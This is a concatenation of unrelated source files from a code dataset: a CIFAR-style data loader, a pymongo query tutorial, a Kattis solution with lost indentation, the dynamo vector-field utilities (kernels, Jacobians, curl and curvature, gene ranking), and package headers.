            downloaded_list = self.test_list

        self.data = []
        self.targets = []

        # now load the picked numpy arrays
        for file_name, checksum in downloaded_list:
            file_path = os.path.join(self.root, self.base_folder, file_name)
            with open(file_path, 'rb') as f:
                if sys.version_info[0] == 2:
                    entry = pickle.load(f)
                else:
                    entry = pickle.load(f, encoding='latin1')
                if 'labels' in entry:
                    lab = entry['labels']
                else:
                    lab = entry['fine_labels']
                # Keep only samples whose label is in this task's subset,
                # remapping the class id to its position within `labels`.
                for i,l in enumerate(lab):
                    if l in labels and (len(self.data) < args.num_data or args.num_data == -1):
                        self.data.append(entry['data'][i])
                        self.targets.append(labels.index(l))

        self.data = np.vstack(self.data).reshape(-1, 3, 32, 32)
        self.data = self.data.transpose((0, 2, 3, 1))  # convert to HWC

        self._load_meta()

    def get_sample(self, sample_size):
        """Return sample_size random images, transformed and batched (1,C,H,W) each."""
        sample_idx = random.sample(range(len(self)), sample_size)
        temp = []
        for img in self.data[sample_idx]:
            if self.transform:
                img = self.transform(Image.fromarray(img)).unsqueeze(0)
            temp.append(img)
        return temp
Week_2/02_pymongo_query_find.py | KartikKannapur/MongoDB_M101P | 0 | 12769677 | <filename>Week_2/02_pymongo_query_find.py<gh_stars>0
__author__ = "<NAME>"

# NOTE(review): this script uses Python 2 print statements; it will not run
# under Python 3 without converting them to print() calls.

# #Import Python Libraries
from pymongo import MongoClient
import json

# #Import Property Files
# import properties as prop
# Connection settings (host/port/credentials) are read from properties.json.
json_properties_file = open("properties.json")
json_properties = json.loads(json_properties_file.read())

# #Connect to the Mongo Database
client = MongoClient(json_properties["host"], json_properties["port"])
# auth = client.admin.authenticate(json_properties["username"], json_properties["password"])

# #Database - test
# #Collection - people
database = client.test
collection = database.people

# #Connect to the Database
print " --- Return all documents --- "
# #find() returns a cursor in python
print list(collection.find())

print " --- Find One document --- "
print collection.find_one()

print " --- Find One document with a query condition --- "
query_1 = {"age" : 45}
print collection.find_one(query_1)

# #Projections
print " --- Finding documents with Projections --- "
query_2 = {"age" : 45}
# #SELECT name & I don't want to see _id
projection = {"name" : 1, "_id" : 0}
print list(collection.find(query_2, projection))

# #Insert
# #insert_one()
# #insert_many([list_of_documents_to_be_inserted], flag = order_in_which_they_have_to_be_inserted )

# #Update
# #update_one()
# #update_many()
# #upsert()

# #Delete
# #delete_one()
# #delete_many()
| 3.109375 | 3 |
kattis/python/quadrant_selection.py | PixPanz/VariousTomfoolery | 0 | 12769678 | x = int(input())
y = int(input())
ans = 0
if x > 0:
if y > 0:
ans = 1
else: ans = 4
else:
if y > 0:
ans = 2
else: ans = 3
print(ans) | 3.65625 | 4 |
dynamo/vectorfield/utils.py | davisidarta/dynamo-release | 0 | 12769679 | from tqdm import tqdm
import numpy as np
import pandas as pd
from scipy.spatial.distance import cdist
from scipy.sparse import issparse
import numdifftools as nd
from multiprocessing.dummy import Pool as ThreadPool
import multiprocessing as mp
import itertools, functools
from ..tools.utils import timeit
def is_outside_domain(x, domain):
    """Flag which rows of ``x`` fall outside the box [domain[0], domain[1]].

    A 1-D ``x`` is treated as a single point; returns a boolean array with
    one entry per point.
    """
    pts = x[None, :] if x.ndim == 1 else x
    below = pts < domain[0]
    above = pts > domain[1]
    return np.any(below | above, axis=1)
def grad(f, x):
    """Gradient of scalar-valued function f evaluated at x (numdifftools, numerical)."""
    return nd.Gradient(f)(x)
def laplacian(f, x):
    """Laplacian of scalar field f evaluated at x.

    Computed as the sum of the diagonal Hessian entries (numdifftools).
    """
    hes = nd.Hessdiag(f)(x)
    return sum(hes)
# ---------------------------------------------------------------------------------------------------
# vector field function
@timeit
def vector_field_function(x, vf_dict, dim=None, kernel='full', **kernel_kwargs):
    """vector field function constructed by sparseVFC.

    Evaluates the learned field at points ``x`` as K(x, X_ctrl) @ C, where the
    kernel is either the plain Gaussian (con_K) or the divergence/curl-free
    combination (con_K_div_cur_free) depending on what the fit stored.

    Reference: Regularized vector field learning with sparse approximation for mismatch removal, Ma, Jiayi, etc. al, Pattern Recognition
    """
    # x=np.array(x).reshape((1, -1))
    if "div_cur_free_kernels" in vf_dict.keys():
        has_div_cur_free_kernels = True
    else:
        has_div_cur_free_kernels = False

    #x = np.array(x)
    if x.ndim == 1:
        x = x[None, :]

    if has_div_cur_free_kernels:
        # con_K_div_cur_free returns (full, df_kernel, cf_kernel); pick one.
        if kernel == 'full':
            kernel_ind = 0
        elif kernel == 'df_kernel':
            kernel_ind = 1
        elif kernel == 'cf_kernel':
            kernel_ind = 2
        else:
            raise ValueError(f"the kernel can only be one of {'full', 'df_kernel', 'cf_kernel'}!")

        K = con_K_div_cur_free(x, vf_dict["X_ctrl"], vf_dict["sigma"], vf_dict["eta"], **kernel_kwargs)[kernel_ind]
    else:
        Xc = vf_dict["X_ctrl"]
        K = con_K(x, Xc, vf_dict["beta"], **kernel_kwargs)

    K = K.dot(vf_dict["C"])

    if dim is not None and not has_div_cur_free_kernels:
        # A scalar dim keeps the first `dim` output columns; a sequence
        # selects those specific columns.
        if np.isscalar(dim):
            K = K[:, :dim]
        elif dim is not None:
            K = K[:, dim]

    return K
@timeit
def con_K(x, y, beta, method='cdist', return_d=False):
    """con_K constructs the kernel K, where K(i, j) = k(x, y) = exp(-beta * ||x - y||^2).

    Arguments
    ---------
        x: :class:`~numpy.ndarray`
            Original training data points.
        y: :class:`~numpy.ndarray`
            Control points used to build kernel basis functions.
        beta: float
            Parameter of Gaussian Kernel, k(x, y) = exp(-beta*||x-y||^2).
        method: str (default: 'cdist')
            Use scipy's cdist for the squared distances; only taken when the
            pairwise difference tensor D is not needed.
        return_d: bool
            If True the intermediate 3D matrix x - y will be returned for analytical Jacobian.

    Returns
    -------
        K: :class:`~numpy.ndarray`
            the kernel to represent the vector field function.
    """
    if method == 'cdist' and not return_d:
        K = cdist(x, y, 'sqeuclidean')
        if len(K) == 1:
            K = K.flatten()
    else:
        n = x.shape[0]
        m = y.shape[0]
        # Build the pairwise difference tensor D[i, :, j] = x[i] - y[j].
        # https://stackoverflow.com/questions/1721802/what-is-the-equivalent-of-matlabs-repmat-in-numpy
        # https://stackoverflow.com/questions/12787475/matlabs-permute-in-python
        D = np.matlib.tile(x[:, :, None], [1, 1, m]) - np.transpose(
            np.matlib.tile(y[:, :, None], [1, 1, n]), [2, 1, 0])
        K = np.squeeze(np.sum(D ** 2, 1))
    K = -beta * K
    K = np.exp(K)

    if return_d:
        return K, D
    else:
        return K
@timeit
def con_K_div_cur_free(x, y, sigma=0.8, eta=0.5):
    """Construct a convex combination of the divergence-free kernel T_df and curl-free kernel T_cf with a bandwidth sigma
    and a combination coefficient gamma.

    Arguments
    ---------
        x: :class:`~numpy.ndarray`
            Original training data points.
        y: :class:`~numpy.ndarray`
            Control points used to build kernel basis functions
        sigma: int (default: `0.8`)
            Bandwidth parameter.
        eta: int (default: `0.5`)
            Combination coefficient for the divergence-free or the curl-free kernels.

    Returns
    -------
        A tuple of G (the combined kernel function), divergence-free kernel and curl-free kernel.

    See also: :func:`sparseVFC`.
    """
    m, d = x.shape
    n, d = y.shape
    sigma2 = sigma ** 2
    # Squared pairwise distances between x and y (m x n).
    G_tmp = np.matlib.tile(x[:, :, None], [1, 1, n]) - np.transpose(
        np.matlib.tile(y[:, :, None], [1, 1, m]), [2, 1, 0]
    )
    G_tmp = np.squeeze(np.sum(G_tmp ** 2, 1))
    G_tmp3 = -G_tmp / sigma2
    G_tmp = -G_tmp / (2 * sigma2)
    G_tmp = np.exp(G_tmp) / sigma2
    # Expand the scalar kernel to d x d blocks per point pair.
    G_tmp = np.kron(G_tmp, np.ones((d, d)))
    x_tmp = np.matlib.tile(x, [n, 1])
    y_tmp = np.matlib.tile(y, [1, m]).T
    y_tmp = y_tmp.reshape((d, m * n), order='F').T
    xminusy = x_tmp - y_tmp
    G_tmp2 = np.zeros((d * m, d * n))
    tmp4_ = np.zeros((d, d))

    # Accumulate the symmetric (x-y)(x-y)^T outer-product blocks, one
    # (i, j) dimension pair at a time.
    for i in tqdm(range(d), desc="Iterating each dimension in con_K_div_cur_free:"):
        for j in np.arange(i, d):
            tmp1 = xminusy[:, i].reshape((m, n), order='F')
            tmp2 = xminusy[:, j].reshape((m, n), order='F')
            tmp3 = tmp1 * tmp2
            tmp4 = tmp4_.copy()
            tmp4[i, j] = 1
            tmp4[j, i] = 1
            G_tmp2 = G_tmp2 + np.kron(tmp3, tmp4)
    G_tmp2 = G_tmp2 / sigma2
    G_tmp3 = np.kron((G_tmp3 + d - 1), np.eye(d))
    G_tmp4 = np.kron(np.ones((m, n)), np.eye(d)) - G_tmp2
    df_kernel, cf_kernel = (1 - eta) * G_tmp * (G_tmp2 + G_tmp3), eta * G_tmp * G_tmp4
    G = df_kernel + cf_kernel

    return G, df_kernel, cf_kernel
def vecfld_from_adata(adata, basis='', vf_key='VecFld'):
    """Fetch the stored vector-field dictionary for ``basis`` from ``adata.uns``.

    Parameters
    ----------
        adata: anndata object with ``.uns``.
        basis: str or None
            Embedding basis; a non-empty value selects the key ``VecFld_<basis>``.
        vf_key: str
            Base key under which the fit was stored.

    Returns
    -------
        (vf_dict, func) where ``func(x)`` evaluates the reconstructed field.

    Raises
    ------
        ValueError if no vector field was stored under the resolved key.
    """
    # BUG FIX: was `basis is not None or len(basis) > 0`, which raised a
    # TypeError for basis=None (len(None)) and wrongly built the key
    # "VecFld_" for basis="". Only append the suffix for a non-empty basis.
    if basis is not None and len(basis) > 0:
        vf_key = '%s_%s' % (vf_key, basis)

    if vf_key not in adata.uns.keys():
        raise ValueError(
            f'Vector field function {vf_key} is not included in the adata object! '
            f"Try firstly running dyn.tl.VectorField(adata, basis='{basis}')")

    vf_dict = adata.uns[vf_key]['VecFld']
    func = lambda x: vector_field_function(x, vf_dict)
    return vf_dict, func
def vector_transformation(V, Q):
    """Map low-dimensional vectors back to the original space.

    Applies :math:`\\hat{v} = v Q^T`, where Q is the d x k PCA loading
    matrix and each row of V is a k-dimensional vector.

    Parameters
    ----------
        V: :class:`~numpy.ndarray`
            n x k array of vectors to transform.
        Q: :class:`~numpy.ndarray`
            d x k PCA loading matrix.

    Returns
    -------
        :class:`~numpy.ndarray`
            n x d array of transformed vectors.
    """
    return np.matmul(V, Q.T)
def vector_field_function_transformation(vf_func, Q):
    """Lift a PCA-space vector-field function to the original space.

    Returns a callable computing :math:`\\hat{f}(x) = f(x) Q^T`, where Q is
    the d x k PCA loading matrix and ``vf_func.func`` is the fitted
    low-dimensional field.

    Parameters
    ----------
        vf_func:
            Object exposing the fitted field as the attribute ``func``.
        Q: :class:`~numpy.ndarray`
            d x k PCA loading matrix.

    Returns
    -------
        callable
            The transformed vector field function.
    """
    def transformed(x):
        return vf_func.func(x) @ Q.T

    return transformed
# ---------------------------------------------------------------------------------------------------
# jacobian
def Jacobian_rkhs_gaussian(x, vf_dict, vectorize=False):
    """analytical Jacobian for RKHS vector field functions with Gaussian kernel.

    Arguments
    ---------
    x: :class:`~numpy.ndarray`
        Coordinates where the Jacobian is evaluated.
    vf_dict: dict
        A dictionary containing RKHS vector field control points, Gaussian bandwidth,
        and RKHS coefficients.
        Essential keys: 'X_ctrl', 'beta', 'C'
    vectorize: bool
        Evaluate all points in one einsum instead of a Python loop
        (faster, higher memory).

    Returns
    -------
    J: :class:`~numpy.ndarray`
        Jacobian matrices stored as d-by-d-by-n numpy arrays evaluated at x.
        d is the number of dimensions and n the number of coordinates in x.
    """
    if x.ndim == 1:
        K, D = con_K(x[None, :], vf_dict['X_ctrl'], vf_dict['beta'], return_d=True)
        J = (vf_dict['C'].T * K) @ D[0].T
    elif not vectorize:
        n, d = x.shape
        J = np.zeros((d, d, n))
        for i, xi in enumerate(x):
            K, D = con_K(xi[None, :], vf_dict['X_ctrl'], vf_dict['beta'], return_d=True)
            J[:, :, i] = (vf_dict['C'].T * K) @ D[0].T
    else:
        K, D = con_K(x, vf_dict['X_ctrl'], vf_dict['beta'], return_d=True)
        if K.ndim == 1: K = K[None, :]
        J = np.einsum('nm, mi, njm -> ijn', K, vf_dict['C'], D)

    # The -2*beta factor comes from differentiating exp(-beta*||x - y||^2).
    return -2 * vf_dict['beta'] * J
def Jacobian_rkhs_gaussian_parallel(x, vf_dict, cores=None):
    """Evaluate Jacobian_rkhs_gaussian over chunks of x using a thread pool.

    The input is split into roughly equal chunks (one per core); each chunk's
    d-by-d-by-k result is transposed to k-by-d-by-d so the chunks can be
    stacked, then transposed back to the d-by-d-by-n convention.
    """
    n = len(x)
    if cores is None: cores = mp.cpu_count()
    n_j_per_core = int(np.ceil(n / cores))
    xx = []
    for i in range(0, n, n_j_per_core):
        xx.append(x[i:i+n_j_per_core])
    #with mp.Pool(cores) as p:
    #    ret = p.starmap(Jacobian_rkhs_gaussian, zip(xx, itertools.repeat(vf_dict)))
    with ThreadPool(cores) as p:
        ret = p.starmap(Jacobian_rkhs_gaussian, zip(xx, itertools.repeat(vf_dict)))
    ret = [np.transpose(r, axes=(2, 0, 1)) for r in ret]
    ret = np.transpose(np.vstack(ret), axes=(1, 2, 0))
    return ret
def Jacobian_numerical(f, input_vector_convention='row'):
    '''
    Get the numerical Jacobian of the vector field function.
    If the input_vector_convention is 'row', it means that fjac takes row vectors
    as input, otherwise the input should be an array of column vectors. Note that
    the returned Jacobian would behave exactly the same if the input is an 1d array.

    The column vector convention is slightly faster than the row vector convention.
    So the matrix of row vector convention is converted into column vector convention
    under the hood.

    No matter the input vector convention, the returned Jacobian is of the following
    format:
            df_1/dx_1   df_1/dx_2   df_1/dx_3   ...
            df_2/dx_1   df_2/dx_2   df_2/dx_3   ...
            df_3/dx_1   df_3/dx_2   df_3/dx_3   ...
            ...         ...         ...         ...
    '''
    # nd.Jacobian works in column-vector convention; wrap f accordingly.
    fjac = nd.Jacobian(lambda x: f(x.T).T)
    if input_vector_convention == 'row' or input_vector_convention == 0:
        def f_aux(x):
            x = x.T
            return fjac(x)
        return f_aux
    else:
        return fjac
@timeit
def elementwise_jacobian_transformation(Js, qi, qj):
    """Project per-cell PCA-space Jacobians onto a single gene pair.

    For each cell c this computes ``qi @ J_c @ qj`` — the (regulator i,
    effector j) entry of the inverse-transformed Jacobian Q J Q^T — using one
    row of the PC loading matrix per gene.

    Parameters
    ----------
        Js: :class:`~numpy.ndarray`
            k x k x n stack of per-cell Jacobians.
        qi: :class:`~numpy.ndarray`
            Row of the PC loading matrix for regulator gene i.
        qj: :class:`~numpy.ndarray`
            Row of the PC loading matrix for effector gene j.

    Returns
    -------
        ret: :class:`~numpy.ndarray`
            Length-n vector of :math:`\\partial F_i / \\partial x_j` values,
            one per cell.
    """
    Js = np.atleast_3d(Js)
    n_cells = Js.shape[2]
    out = np.zeros(n_cells)
    for c in tqdm(range(n_cells), "calculating Jacobian for each cell"):
        out[c] = qi @ Js[:, :, c] @ qj
    return out
@timeit
def subset_jacobian_transformation(Js, Qi, Qj, cores=1):
    """Transform Jacobian matrix (:math:`\\partial F_i / \\partial x_j`) from PCA space to the original space.

    The formula used for transformation:
                            :math:`\\hat{J} = Q J Q^T`,
    where `Q, J, \\hat{J}` are the PCA loading matrix, low dimensional Jacobian matrix and the inverse transformed high
    dimensional Jacobian matrix. This function takes multiple rows from Q to form Qi or Qj.

    Parameters
    ----------
        Js: :class:`~numpy.ndarray`
            k x k x n stack of per-cell low-dimensional Jacobians.
        Qi: :class:`~numpy.ndarray`
            Sampled genes' PCA loading matrix with dimension n' x n_PCs (regulators).
        Qj: :class:`~numpy.ndarray`
            Sampled genes' PCA loading matrix with dimension n' x n_PCs (effectors);
            may differ from Qi.
        cores: int (default: 1):
            Number of cores to calculate Jacobian. If cores is set to be > 1, a thread
            pool will be used to parallel the Jacobian calculation.

    Returns
    -------
        ret: :class:`~numpy.ndarray`
            The calculated Jacobian matrix (n_gene x n_gene x n_obs) for each cell.
    """
    Js = np.atleast_3d(Js)
    Qi = np.atleast_2d(Qi)
    Qj = np.atleast_2d(Qj)
    d1, d2, n = Qi.shape[0], Qj.shape[0], Js.shape[2]

    ret = np.zeros((d1, d2, n))

    if cores == 1:
        ret = transform_jacobian(Js, Qi, Qj, pbar=True)
    else:
        # Split the cell axis into per-core chunks, transform each chunk in a
        # thread, then reassemble into (d1, d2, n).
        if cores is None: cores = mp.cpu_count()
        n_j_per_core = int(np.ceil(n / cores))
        JJ = []
        for i in range(0, n, n_j_per_core):
            JJ.append(Js[:, :, i:i+n_j_per_core])
        with ThreadPool(cores) as p:
            ret = p.starmap(transform_jacobian, zip(JJ,
                            itertools.repeat(Qi), itertools.repeat(Qj)))
        ret = [np.transpose(r, axes=(2, 0, 1)) for r in ret]
        ret = np.transpose(np.vstack(ret), axes=(1, 2, 0))

    return ret
def transform_jacobian(Js, Qi, Qj, pbar=False):
    """Compute Qi @ J_c @ Qj.T for every cell c in the stack ``Js``.

    Returns a float32 array of shape (Qi rows, Qj rows, n_cells); set
    ``pbar=True`` for a tqdm progress bar.
    """
    n_cells = Js.shape[2]
    out = np.zeros((Qi.shape[0], Qj.shape[0], n_cells), dtype=np.float32)
    if pbar:
        cell_iter = tqdm(range(n_cells), desc='Transforming subset Jacobian')
    else:
        cell_iter = range(n_cells)
    for c in cell_iter:
        out[:, :, c] = Qi @ Js[:, :, c] @ Qj.T
    return out
def average_jacobian_by_group(Js, group_labels):
    """
    Returns a dictionary of averaged jacobians with group names as the keys.
    No vectorized indexing was used due to its high memory cost.

    Parameters
    ----------
        Js: d x d x n stack of per-cell Jacobians.
        group_labels: length-n array of group labels, one per cell.
    """
    groups = np.unique(group_labels)

    J_mean = {}
    N = {}
    for i, g in enumerate(group_labels):
        if g in J_mean.keys():
            J_mean[g] += Js[:, :, i]
            N[g] += 1
        else:
            # BUG FIX: copy the slice. Storing the raw view meant the
            # in-place += and /= below mutated the caller's Js array.
            J_mean[g] = Js[:, :, i].copy()
            N[g] = 1
    for g in groups:
        J_mean[g] /= N[g]
    return J_mean
# ---------------------------------------------------------------------------------------------------
# dynamical properties
def _divergence(f, x):
    """Divergence of the reconstructed vector field function f evaluated at x.

    Computed numerically as the trace of the numdifftools Jacobian.
    """
    jac = nd.Jacobian(f)(x)
    return np.trace(jac)
@timeit
def compute_divergence(f_jac, X, vectorize_size=1):
    """Calculate divergence for many samples by taking the trace of a Jacobian matrix.

    vectorize_size is used to control the number of samples computed in each vectorized batch.
        If vectorize_size = 1, there's no vectorization whatsoever.
        If vectorize_size = None, all samples are vectorized.
    """
    n = len(X)
    if vectorize_size is None: vectorize_size = n

    div = np.zeros(n)
    for i in tqdm(range(0, n, vectorize_size), desc="Calculating divergence"):
        J = f_jac(X[i:i+vectorize_size])
        # np.trace over the first two axes of a d x d x k stack yields the
        # per-sample traces (length k).
        div[i:i+vectorize_size] = np.trace(J)
    return div
def acceleration_(v, J):
    """Acceleration a = J v for one sample; a 1-D v is promoted to a column."""
    col = v[:, None] if v.ndim == 1 else v
    return J.dot(col)
def curvature_1(a, v):
    """https://link.springer.com/article/10.1007/s12650-018-0474-6"""
    col = v[:, None] if v.ndim == 1 else v
    return np.linalg.norm(np.outer(col, a)) / np.linalg.norm(col) ** 3
def curvature_2(a, v):
    """https://dl.acm.org/doi/10.5555/319351.319441"""
    # if v.ndim == 1: v = v[:, None]
    speed4 = np.linalg.norm(v) ** 4
    return (a * np.dot(v, v) - v * np.dot(v, a)) / speed4
def torsion_(v, J, a):
    """only works in 3D"""
    col = v[:, None] if v.ndim == 1 else v
    va_outer = np.outer(col, a)
    return va_outer.dot(J.dot(a)) / np.linalg.norm(va_outer) ** 2
@timeit
def compute_acceleration(vf, f_jac, X, return_all=False):
    """Calculate acceleration for many samples via

    .. math::
    a = J \\cdot v.

    ``vf`` evaluates velocities for all rows of X at once; ``f_jac`` returns
    the d x d x n stack of Jacobians. With ``return_all`` the velocities and
    Jacobians are returned alongside the accelerations.
    """
    n = len(X)
    acce = np.zeros((n, X.shape[1]))

    v_ = vf(X)
    J_ = f_jac(X)
    for i in tqdm(range(n), desc=f"Calculating acceleration"):
        v = v_[i]
        J = J_[:, :, i]
        # acceleration_ returns a column vector; flatten to a row of acce.
        acce[i] = acceleration_(v, J).flatten()
    if return_all:
        return v_, J_, acce
    else:
        return acce
@timeit
def compute_curvature(vf, f_jac, X, formula=2):
    """Calculate curvature for many samples via

    Formula 1:
    .. math::
    \\kappa = \\frac{||\\mathbf{v} \\times \\mathbf{a}||}{||\\mathbf{V}||^3}

    Formula 2:
    .. math::
    \\kappa = \\frac{||\\mathbf{Jv} (\\mathbf{v} \\cdot \\mathbf{v}) - ||\\mathbf{v} (\\mathbf{v} \\cdot \\mathbf{Jv})}{||\\mathbf{V}||^4}

    Returns a tuple ``(curv, cur_mat)``; ``cur_mat`` holds the per-sample
    curvature vectors for formula 2 and is None for formula 1.
    """
    n = len(X)

    curv = np.zeros(n)
    v, _, a = compute_acceleration(vf, f_jac, X, return_all=True)
    cur_mat = np.zeros((n, X.shape[1])) if formula == 2 else None

    for i in tqdm(range(n), desc="Calculating curvature"):
        if formula == 1:
            curv[i] = curvature_1(a[i], v[i])
        elif formula == 2:
            cur_mat[i] = curvature_2(a[i], v[i])
            # Scalar curvature is the norm of the curvature vector.
            curv[i] = np.linalg.norm(cur_mat[i])

    return (curv, cur_mat)
@timeit
def compute_torsion(vf, f_jac, X):
    """Calculate torsion for many samples via

    .. math::
    \\tau = \\frac{(\\mathbf{v} \\times \\mathbf{a}) \\cdot (\\mathbf{J} \\cdot \\mathbf{a})}{||\\mathbf{V} \\times \\mathbf{a}||^2}
    """
    if X.shape[1] != 3:
        raise Exception(f'torsion is only defined in 3 dimension.')

    n = len(X)

    tor = np.zeros((n, X.shape[1], X.shape[1]))
    v, J, a = compute_acceleration(vf, f_jac, X, return_all=True)

    for i in tqdm(range(n), desc="Calculating torsion"):
        # NOTE(review): torsion_ returns a length-3 vector, which broadcasts
        # across the 3x3 slot tor[i] — confirm the intended output shape.
        tor[i] = torsion_(v[i], J[:, :, i], a[i])

    return tor
def _curl(f, x, method='analytical', VecFld=None, jac=None):
"""Curl of the reconstructed vector field f evaluated at x in 3D"""
if jac is None:
if method == 'analytical' and VecFld is not None:
jac = Jacobian_rkhs_gaussian(x, VecFld)
else:
jac = nd.Jacobian(f)(x)
return np.array([jac[2, 1] - jac[1, 2], jac[0, 2] - jac[2, 0], jac[1, 0] - jac[0, 1]])
def curl2d(f, x, method='analytical', VecFld=None, jac=None):
    """Curl of the reconstructed vector field f evaluated at x in 2D"""
    if jac is None:
        if method == 'analytical' and VecFld is not None:
            jac = Jacobian_rkhs_gaussian(x, VecFld)
        else:
            jac = nd.Jacobian(f)(x)

    # Scalar curl in 2D: d(f_y)/dx - d(f_x)/dy.
    return jac[1, 0] - jac[0, 1]
@timeit
def compute_curl(f_jac, X):
    """Calculate curl for many samples for 2/3 D systems.

    Returns a length-n array of scalar curls in 2D, or an n x 3 array of
    curl vectors in 3D.
    """
    if X.shape[1] > 3:
        raise Exception(f'curl is only defined in 2/3 dimension.')

    n = len(X)

    if X.shape[1] == 2:
        curl = np.zeros(n)
        f = curl2d
    else:
        # BUG FIX: was np.zeros((n, 2, 2)), but _curl returns a length-3
        # vector, so the per-sample assignment below could not hold it.
        curl = np.zeros((n, 3))
        f = _curl

    for i in tqdm(range(n), desc=f"Calculating {X.shape[1]}-D curl"):
        J = f_jac(X[i])
        curl[i] = f(None, None, method='analytical', VecFld=None, jac=J)

    return curl
# ---------------------------------------------------------------------------------------------------
# ranking related utilies
def get_metric_gene_in_rank(mat, genes, neg=False):
    """Rank genes by their column-wise mean metric.

    Sparse matrices are densified via ``.A1``. The ranking is descending by
    default; ``neg=True`` ranks ascending (most negative first).
    """
    if issparse(mat):
        means = mat.mean(0).A1
    else:
        means = mat.mean(0)
    order = means.argsort()
    if not neg:
        order = order[::-1]
    return means[order], genes[order]
def get_metric_gene_in_rank_by_group(mat, genes, groups, grp, neg=False):
    """Rank genes by their mean metric within the cells belonging to ``grp``.

    Returns (ranked means, unranked group means, genes in rank order).
    The ranking is descending unless ``neg=True``.
    """
    mask = groups == grp
    if type(mask) == pd.Series:
        mask = mask.values

    means = mat[mask, :].mean(0).A1 if issparse(mat) else mat[mask, :].mean(0)
    group_wise_metrics = means.copy()

    order = means.argsort()
    if not neg:
        order = order[::-1]
    return means[order], group_wise_metrics, genes[order]
def get_sorted_metric_genes_df(df, genes, neg=False):
    """Per-column sort of metric values and the matching gene names.

    ``df`` has genes as rows and groups as columns. For each group, returns
    the metric values in sorted order (descending unless ``neg=True``) and
    the gene names arranged in the same order, as two DataFrames.
    """
    metric_cols = {}
    gene_cols = {}
    for key, values in df.transpose().iterrows():
        if neg:
            metric_cols[key] = sorted(values, reverse=False)
            gene_cols[key] = genes[values.argsort()]
        else:
            metric_cols[key] = sorted(values, reverse=True)
            gene_cols[key] = genes[values.argsort()[::-1]]
    return pd.DataFrame(metric_cols), pd.DataFrame(gene_cols)
def rank_vector_calculus_metrics(mat, genes, group, groups, uniq_group):
    """Rank genes by a vector-calculus metric, globally or per group.

    mat: cell-by-gene metric matrix (dense ndarray or scipy sparse).
    genes: array of gene names aligned with mat's columns.
    group: grouping key name, or None for a single global ranking.
    groups: per-cell group labels (used only when group is not None).
    uniq_group: the unique group labels to iterate over.

    Returns a 6-tuple (all / positive-part / negative-part rankings) when
    group is None, otherwise a 12-tuple of gene-wise and group-wise
    DataFrames for the same three rankings.
    """
    # Split the metric into positive and negative parts so genes can be
    # ranked separately by how strongly positive / negative they are.
    if issparse(mat):
        mask = mat.data > 0
        pos_mat, neg_mat = mat.copy(), mat.copy()
        pos_mat.data[~ mask], neg_mat.data[mask] = 0, 0
        pos_mat.eliminate_zeros()
        neg_mat.eliminate_zeros()
    else:
        mask = mat > 0
        pos_mat, neg_mat = mat.copy(), mat.copy()
        pos_mat[~ mask], neg_mat[mask] = 0, 0
    if group is None:
        # Global ranking: magnitude, positive part (descending), negative
        # part (ascending, i.e. most negative first).
        metric_in_rank, genes_in_rank = get_metric_gene_in_rank(abs(mat), genes)
        pos_metric_in_rank, pos_genes_in_rank = get_metric_gene_in_rank(pos_mat, genes)
        neg_metric_in_rank, neg_genes_in_rank = get_metric_gene_in_rank(neg_mat, genes, neg=True)
        return metric_in_rank, genes_in_rank, pos_metric_in_rank, pos_genes_in_rank, neg_metric_in_rank, neg_genes_in_rank
    else:
        # Per-group ranking: build one entry per group for each of the six
        # parallel result dictionaries, then convert them to DataFrames.
        gene_wise_metrics, gene_wise_genes, gene_wise_pos_metrics, gene_wise_pos_genes, gene_wise_neg_metrics, gene_wise_neg_genes = {}, {}, {}, {}, {}, {}
        group_wise_metrics, group_wise_genes, group_wise_pos_metrics, group_wise_pos_genes, group_wise_neg_metrics, group_wise_neg_genes = {}, {}, {}, {}, {}, {}
        for i, grp in tqdm(enumerate(uniq_group), desc='ranking genes across gropus'):
            gene_wise_metrics[grp], group_wise_metrics[grp], gene_wise_genes[grp] = None, None, None
            gene_wise_metrics[grp], group_wise_metrics[grp], gene_wise_genes[grp] = \
                get_metric_gene_in_rank_by_group(abs(mat), genes, groups, grp)
            gene_wise_pos_metrics[grp], group_wise_pos_metrics[grp], gene_wise_pos_genes[grp] = None, None, None
            gene_wise_pos_metrics[grp], group_wise_pos_metrics[grp], gene_wise_pos_genes[grp] = \
                get_metric_gene_in_rank_by_group(pos_mat, genes, groups, grp)
            gene_wise_neg_metrics[grp], group_wise_neg_metrics[grp], gene_wise_neg_genes[grp] = None, None, None
            gene_wise_neg_metrics[grp], group_wise_neg_metrics[grp], gene_wise_neg_genes[grp] = \
                get_metric_gene_in_rank_by_group(neg_mat, genes, groups, grp, neg=True)
        # Group-wise view: each column is a group, sorted within the column.
        metric_in_group_rank_by_gene, genes_in_group_rank_by_gene = \
            get_sorted_metric_genes_df(pd.DataFrame(group_wise_metrics), genes)
        pos_metric_gene_rank_by_group, pos_genes_group_rank_by_gene = \
            get_sorted_metric_genes_df(pd.DataFrame(group_wise_pos_metrics), genes)
        neg_metric_in_group_rank_by_gene, neg_genes_in_group_rank_by_gene = \
            get_sorted_metric_genes_df(pd.DataFrame(group_wise_neg_metrics), genes, neg=True)
        # Gene-wise view: dictionaries already hold rank-ordered vectors.
        metric_in_gene_rank_by_group, genes_in_gene_rank_by_group = \
            pd.DataFrame(gene_wise_metrics), pd.DataFrame(gene_wise_genes)
        pos_metric_in_gene_rank_by_group, pos_genes_in_gene_rank_by_group = \
            pd.DataFrame(gene_wise_pos_metrics), pd.DataFrame(gene_wise_pos_genes)
        neg_metric_in_gene_rank_by_group, neg_genes_in_gene_rank_by_group = \
            pd.DataFrame(gene_wise_neg_metrics), pd.DataFrame(gene_wise_neg_genes)
        return (metric_in_gene_rank_by_group, genes_in_gene_rank_by_group, pos_metric_in_gene_rank_by_group,
                pos_genes_in_gene_rank_by_group, neg_metric_in_gene_rank_by_group, neg_genes_in_gene_rank_by_group,
                metric_in_group_rank_by_gene, genes_in_group_rank_by_gene, pos_metric_gene_rank_by_group,
                pos_genes_group_rank_by_gene, neg_metric_in_group_rank_by_gene, neg_genes_in_group_rank_by_gene,)
| 2.203125 | 2 |
finance_ml/features/__init__.py | zli69/finance_ml | 51 | 12769680 | from .importance import feat_imp_MDA, feat_imp_MDI, feat_imp_SFI
from .orth import get_evec, ortho_feats
from .entropy import match_length, lempel_zib_lib, get_entropy_rate, plug_in, konto
from .fraction import get_opt_d, frac_diff_FFD | 1.015625 | 1 |
scripts/OshAdjustGradient.py | ebhoward/QgisIMPTools | 0 | 12769681 | """
***************************************************************************
OshAdjustGradient.py
---------------------
Date : Nov 2020
Copyright : (C) 2020 by <NAME>
Email : <EMAIL> at g<EMAIL> dot <EMAIL>
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
